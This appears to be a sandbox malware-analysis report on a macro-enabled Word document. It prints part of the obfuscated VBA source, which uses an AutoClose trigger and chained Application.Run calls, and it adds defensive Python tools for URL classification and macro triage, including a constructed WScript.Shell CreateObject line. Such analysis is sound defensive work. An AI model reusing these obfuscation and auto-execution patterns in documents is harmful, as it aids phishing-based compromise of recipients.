Verdict: MALICIOUS (risk score 262)
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment
This OOXML (Word) document carries a VBA project whose auto-execution entry point is an AutoClose procedure, so the macro runs when the document is closed rather than when it is opened; an analysis environment that opens the file but never closes it will not trigger it. The extracted source is padded with meaningless arithmetic (sums of Atn(...) calls and constants) and string assignments (Left/LTrim/RTrim applied to literals), chains its procedures through Application.Run "<name>" so that no direct call appears in the source, and defines a Replace() wrapper (RFDTUEwyjriOCQBKnE), a pattern commonly used to reassemble strings at run time. The heuristics also flag a CreateObject call, consistent with an object-execution stage that launches a second-stage payload. The target of the final Application.Run and what the created object does are not discernible from the script excerpt, so the family is classified as 'unknown'. VBA macros combined with an auto-close trigger of this kind point to a malicious document built for initial compromise via spearphishing.
Heuristics (6)
- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
- OOXML_VBA (medium, 3 related findings): VBA project inside OOXML. The document contains a VBA project, so VBA macros are present.
- OLE_VBA_AUTOCLOSE (high): Auto_Close macro. The extracted source names the procedure AutoClose, which Word runs when the document is closed (Auto_Close is the Excel spelling of the same trigger).
- OLE_VBA_CREATEOBJ (high): CreateObject call.
- OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens. The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- EMBEDDED_URL (info): Embedded URL. One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. All fifteen URLs below were found in document text (OOXML body / shared strings) and are XML namespace identifiers that Word writes into the package's XML parts; they are not contacted when the document opens and are not network indicators.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
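The channel label matters more than the URL string. As an added example (not the analyzer's own code), the following walks a constructed minimal .docx and separates namespace identifiers from external hyperlink targets and URLs in body text, which are the only ones worth treating as indicators. The sample package, its hostnames invoice.example and login.example, and the NAMESPACE_HOSTS allowlist are assumptions for illustration.

```python
"""Classify URLs found in an OOXML package by the channel that carries them.
Added example, not analyzer code: the fifteen URLs in the report above are all
XML namespace identifiers; this separates those from hyperlink targets and URLs
in document text, which are the ones worth treating as indicators."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Hosts used only as XML namespace / relationship-type identifiers in OOXML.
# Word never connects to them when a document is opened. (Assumed allowlist.)
NAMESPACE_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com",
                   "www.w3.org", "purl.org"}
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
XMLNS_RE = re.compile(rb'xmlns(?::\w+)?="([^"]+)"')
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def classify(url):
    """'namespace' for identifier-only hosts, 'indicator' for anything else.
    Exact host match: schemas.microsoft.com.attacker.example is an indicator."""
    return "namespace" if urlparse(url).hostname in NAMESPACE_HOSTS else "indicator"


def extract_urls(docx_bytes):
    """[(url, channel, class)] for every XML part in the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith((".xml", ".rels")):
                continue
            data = z.read(name)
            root = ET.fromstring(data)
            # ElementTree does not expose xmlns declarations as attributes,
            # so pull them from the raw bytes.
            for m in XMLNS_RE.finditer(data):
                u = m.group(1).decode()
                found.append((u, "xml namespace declaration", classify(u)))
            if name.endswith(".rels"):
                for rel in root.iter(REL_NS + "Relationship"):
                    found.append((rel.get("Type"), "relationship type", classify(rel.get("Type"))))
                    if rel.get("TargetMode") == "External":
                        t = rel.get("Target")
                        found.append((t, "external relationship target", classify(t)))
            else:
                for text in root.itertext():
                    for u in URL_RE.findall(text):
                        found.append((u, "document text", classify(u)))
    return found


def indicators(docx_bytes):
    """Sorted, de-duplicated URLs that are not namespace identifiers."""
    return sorted({u for u, _, c in extract_urls(docx_bytes) if c == "indicator"})


def build_sample_docx():
    """Constructed minimal .docx (not the analysed sample): three namespace
    declarations, one external hyperlink relationship, one URL in body text."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
        ' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"'
        ' xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml">'
        '<w:body><w:p><w:r><w:t>Invoice at http://invoice.example/pay</w:t></w:r></w:p>'
        '<w:p><w:hyperlink r:id="rId5"><w:r><w:t>open</w:t></w:r></w:hyperlink></w:p>'
        '</w:body></w:document>')
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Target="styles.xml"'
        ' Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"/>'
        '<Relationship Id="rId5" Target="https://login.example/portal" TargetMode="External"'
        ' Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>'
        '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for url, channel, cls in extract_urls(build_sample_docx()):
        print(f"{cls:9} {channel:30} {url}")
```

Run against a real package the same loop will list the namespace URIs first and the hyperlink and body-text URLs under their own channels; in the report above only the namespace channel is populated, which is why the EMBEDDED_URL finding is informational.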
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13483 bytes | 852c778f2962e76eb2024b34c24168ce14beb34ee6f35c7fb2270dbc0a5af2fe |
Preview of macros.bas (first 1,000 lines of the extracted script; the extraction breaks off at the truncation marker):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ddZSINbyLKwgMY()
jrSzDKTG = "OFwYJIXWrfWMrJ" + "FScoCYcSLSOk" + "vpLGVFSiYZ"
bNjBzGZYny = Left("bMpoWMnrQy", 1) + Left("fncPKLxQAX", 7) + "CdCnXpXHJUZKJpB"
HCRxVLyo = LTrim("dGvFSzMKbwFWGWFNYqXUkXBO") + "kxqjCRGuF" + "LpANOKLYgKBwF"
Application.Run "nRKqqScIPcPJCP"
IjcIGTbzHu = Atn(905.95) - 93.34 - 960.61 - 848.22
wRwQBOFw = Atn(853.64) + 441.88 + 732.54 + Atn(441.98) + 790.2 + Atn(496.3) + 778.85
NuSZHuWpk = Atn(155.21) + Atn(986.24) + Atn(626.62) + Atn(546.44)
VgoojDpOn = Atn(229.83) + Atn(408.36) + 725
kCWuRLkVc = RTrim("CD") + "oioIqZDFIMzMOxjVJ" + "OzCwcBZPYSpIFiUp"
End Sub
Sub ydTknTgvZjPYEr()
XkIrzMB = Left("xAAuvOcriq", 6) + Left("LufbpovRKG", 6) + Left("oUGBEIpPuR", 4) + "fRpSXCGjdbOOcn"
ZucuWWIAyYz = RTrim("oxzpvkXjnfDLLdJGiFCcxFH") + "gfkzHHUMiFPywLnV" + "pISCSxQEMkQBqgdjEOuVXoOICggGHC" + LTrim("YnbKzcNiKEVCVDEuUvcLRRApzvkcVM")
UPXvrnyjZQQ = 324.1 - Atn(739.39) - 574.45 - 47.12
Application.Run "PbjBzYLOLMBpkWS"
BQPRdwE = 619.2 - 267.25 - 320.55 - 746.51 - 13.22 - 91.29
jKoOIfyvf = 383.42 - Atn(546.64) - Atn(831.27) - 708.41
gQzjxrYxDfx = 303.37 + Atn(867.65)
oGNGYUj = "IibEjgcpUGKIXNM" + "DNVEWU" + Left("uGOrDOvNSV", 3) + Left("ZkURCkFKwR", 4)
End Sub
Public Function RFDTUEwyjriOCQBKnE(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD)
ZpVGjOBnkA = Atn(262.42) - 604.22 - 944.82 - Atn(750.29)
xiHzPZXTY = RTrim("EdJUf") + LTrim("YqccxT")
QxIFcEASMjY = "zEFVBfIS" + "jICHBMEYRoNMSVBrIZGL" + "wuMNqVqZVKf" + "VdMy" + "fSwCrVOpH" + "f"
HTDjyZDq = "NJHFwLrKRwnF" + Left("jnnTCcPKff", 6) + "MVTfOuoDPvoY" + Left("kYPMVByYRW", 4) + Left("vxOVizouui", 9)
rnnOipzXfGJ = 944.49 - 706.68 - Atn(451.95) - Atn(397.13) - Atn(263.6)
jvBHGBEpF = 549.3 + 28.35 + 459.34 + 559.35 + Atn(548.23)
RurboUUz = RTrim("jzRyWkENCbqMKWH") + "IXNuWjRnITU"
MTEqJJkWATR = 734.46 + 800.64 + 190.37 + 627 + Atn(327.37) + 9.83 + 894.21
RFDTUEwyjriOCQBKnE = Replace(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD)
njWOzxyWU = 589.87 + Atn(364.13)
UwFJoYziT = 923.4 + 695.65 + Atn(106.51)
SEYgGMSzbZZ = Atn(25.86) - 202.78 - Atn(754.36) - Atn(146.7) - 349.39
AFXrBzU = "HB" + "VVVV" + "Fp"
HqMPUMIbdbT = 455.72 - Atn(376.14) - Atn(310.6) - 978.82
gvyqqpv = "JNI" + "EuPxWgHgcvcPFv" + "XjMpDrLvUVWN" + Left("FIWbjPPXSw", 8)
KLPDoAYPuHy = "d" + LTrim("FHVivBQk") + RTrim("WEMfAKVycJ") + "MFfAGkUWAqiTcoqxHRrdRBJZWY"
yIbroIwObL = "ZpoEziGZHfWfyiU" + LTrim("GMOBVzPQOiNfRjgA") + LTrim("cfzpinQxuZCWSw")
woXoiMXxV = Atn(413.71) + 602.92
QPWzjUoy = "bLiYrdEDyJ" + Left("UiAzVOipbp", 3)
nMIykCiVqLF = "ITLciczkZBcnkOqygYuKRNUvNipo" + "MHL" + "FHuAynIYTjTcZLWHADjgqSvGczTAV" + "zJROMozJvVMRyWGpDZvxO"
INvwXbAViJz = Atn(579.19) + Atn(932.47) + 587.75 + Atn(890.5) + Atn(682.68) + Atn(308.76)
MTNOKVGFKSjC = RTrim("SDTTWckJHpQiMdvbGY") + "Wb" + RTrim("WOzYLjyCYErYCqHDAjqNGGQLfw")
MkGqETkKMfN = LTrim("HIZwCZXCTCckwTGUcrzHDEVPS") + RTrim("OMWdLnuIrMczPfgfTKWL") + LTrim("qwrHCIqHnCUVIPjiBSCwWDVnO")
rzobwTCiE = "ANT" + Left("vRKXuGKEZI", 2) + "HwwWoFoIFNkBMi"
End Function
Sub nRKqqScIPcPJCP()
ZYxVyBXKBKDC = 908.28 - 327.6
xnWEzNCEvrDX = 134.94 - 84.76 - Atn(133.43)
FYVxXIE = Atn(822.94) - 735.52
fnAfNzn = 408.52 + Atn(747.31) + Atn(670.75) + 21.82 + 143.98 + 882.19 + Atn(578.95)
zkkGwKf = Atn(329.1) + 477.2 + 146.8 + Atn(181.37) + 925.23 + 221.33
Application.Run "wzFUOFOLziqcvN"
XHWSqcN = 96.71 + Atn(62.2) + 260.69 + 910.52 + Atn(729.88)
KOIPSPCLVqyR = 580.9 + 530.51 + Atn(463.22) + 597.85
yJwguqzuxj = LTrim("xBPFikHkGOGBbLRJvWWzTWYbALF") + "OgISkDzKWHJgHiJJqrqoE" + LTrim("VnYNrNFxnpfYvfZ") + LTrim("YKJAdRFyDd")
End Sub
Sub AutoClose()
xMQZXqKOQrTc = Atn(664.2) - Atn(589.48)
fTjxYzRV = RTrim("pyikV") + LTrim("pAwdUnLZIRBXFDFWqYuwT") + RTrim("MHZGUvJxNgIACNWwRFZnZBRHMNTI")
yOxPRkuJg = "jNBMcVoxNHrvF
```
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 38912 bytes | 87cb388e257fb42c3d3a2a928e99097c2c1edc20d97a3f8b2d9b2253a48e7889 |

Detection
- ClamAV: Doc.Malware.Emooodldr-6711604-0
- Obfuscation or payload: unlikely
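A triage pass over source like the macros.bas preview above, as an added example that is not part of the analyzer output or of oletools. It strips the padding lines, follows the Application.Run chain from each auto-execution entry point, and reports which execution-capable tokens are reachable, which Run targets have no definition in the recovered source, and which procedures are dead decoys. The ddZSINbyLKwgMY -> nRKqqScIPcPJCP -> wzFUOFOLziqcvN chain, the ydTknTgvZjPYEr decoy and the Replace wrapper are taken from the preview; the AutoClose body and the wzFUOFOLziqcvN body are assumptions, because both are cut off in the report, and the CreateObject/obj.Run lines in the constructed input are placeholders, not recovered payload.

```python
"""Triage of obfuscated VBA like the macros.bas preview above.
Added example, not analyzer or oletools code: takes extracted VBA source text,
drops the padding lines, follows Application.Run "Name" and direct calls from
each auto-execution entry, and reports reachable execution tokens and dead decoys."""
import re

# Procedure names Office runs without user interaction (subset of olevba's list).
AUTOEXEC_NAMES = {"autoopen", "autoclose", "autoexec", "auto_open", "auto_close",
                  "document_open", "document_close", "workbook_open"}
# Tokens an auto-exec + execution heuristic (cf. OLE_VBA_PCODE_AUTOEXEC_EXEC) pairs with the entry.
EXEC_TOKENS = ("CreateObject", "GetObject", "Shell", "WScript.Shell",
               "ShellExecute", "URLDownloadToFile")
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I)
END_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
APPRUN_RE = re.compile(r'Application\.Run\s+"(\w+)"', re.I)
# Padding line: an assignment built only from numbers, Atn(), string literals and
# Left/LTrim/RTrim of literals, i.e. the filler the preview is full of.
JUNK_RE = re.compile(
    r'^\s*\w+\s*=\s*(?:[-+\s\d.]|Atn\([\d.]+\)|"[^"]*"'
    r'|(?:Left|LTrim|RTrim)\("[^"]*"(?:,\s*\d+)?\))+\s*$', re.I)

def parse_procedures(src):
    """{name: [body lines]} for every Sub/Function in the source."""
    procs, current = {}, None
    for line in src.splitlines():
        m = PROC_RE.match(line)
        if m:
            current = m.group(1)
            procs[current] = []
        elif END_RE.match(line):
            current = None
        elif current is not None:
            procs[current].append(line)
    return procs

def call_edges(procs):
    """Callees per procedure: Application.Run "Name" targets (kept even when the
    target is not defined) plus bare mentions of other defined procedures."""
    by_lower = {n.lower(): n for n in procs}
    edges = {}
    for name, body in procs.items():
        callees = set()
        for line in body:
            for target in APPRUN_RE.findall(line):
                callees.add(by_lower.get(target.lower(), target))
            for other in procs:
                if other != name and re.search(r"\b%s\b" % re.escape(other), line, re.I):
                    callees.add(other)
        edges[name] = callees
    return edges

def reachable(edges, start):
    """Procedures reachable from start, depth first, in discovery order."""
    seen, stack = [], [start]
    while stack:
        node = stack.pop()
        if node not in seen:
            seen.append(node)
            stack.extend(sorted(edges.get(node, ()), reverse=True))
    return seen

def triage(src):
    procs, entries = parse_procedures(src), {}
    edges = call_edges(procs)
    for entry in (n for n in procs if n.lower() in AUTOEXEC_NAMES):
        chain = reachable(edges, entry)
        live = {p: [l.strip() for l in procs[p] if l.strip() and not JUNK_RE.match(l)]
                for p in chain if p in procs}
        tokens = sorted({t for lines in live.values() for l in lines
                         for t in EXEC_TOKENS if t.lower() in l.lower()})
        entries[entry] = {"chain": chain, "live": live, "exec_tokens": tokens,
            # Run targets with no definition in the extracted source: truncated
            # extraction, or a module that exists only as p-code (stomped source).
            "undefined": sorted(c for p in chain for c in edges.get(p, ()) if c not in procs)}
    covered = {p for info in entries.values() for p in info["chain"]}
    return {"entries": entries, "unreachable": sorted(set(procs) - covered)}

# Constructed input modelled on the preview. The ddZSINbyLKwgMY -> nRKqqScIPcPJCP
# -> wzFUOFOLziqcvN chain is what the preview shows; the AutoClose body and the
# wzFUOFOLziqcvN body are assumptions, since both are cut off in the report.
SAMPLE = '''
Sub ddZSINbyLKwgMY()
jrSzDKTG = "OFwYJIXWrfWMrJ" + "FScoCYcSLSOk" + "vpLGVFSiYZ"
Application.Run "nRKqqScIPcPJCP"
IjcIGTbzHu = Atn(905.95) - 93.34 - 960.61 - 848.22
End Sub
Sub ydTknTgvZjPYEr()
Application.Run "PbjBzYLOLMBpkWS"
End Sub
Public Function RFDTUEwyjriOCQBKnE(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD)
RFDTUEwyjriOCQBKnE = Replace(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD)
End Function
Sub nRKqqScIPcPJCP()
Application.Run "wzFUOFOLziqcvN"
End Sub
Sub AutoClose()
xMQZXqKOQrTc = Atn(664.2) - Atn(589.48)
Application.Run "ddZSINbyLKwgMY"
End Sub
Sub wzFUOFOLziqcvN()
Set obj = CreateObject(RFDTUEwyjriOCQBKnE("WScr!pt.Shell", "!", "i"))
obj.Run "placeholder_second_stage", 0
End Sub
'''
```

On a real extraction, feed `triage()` the olevba output and look first at entries whose `undefined` list is non-empty: a Run target that exists nowhere in the recovered source is exactly the situation the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic is written for, where the procedure doing the work survives only as p-code. Note that the "WScript.Shell" ProgID never appears literally in the constructed input; only the `Shell` fragment is matched, which is why the token check is a signal and not a decoder.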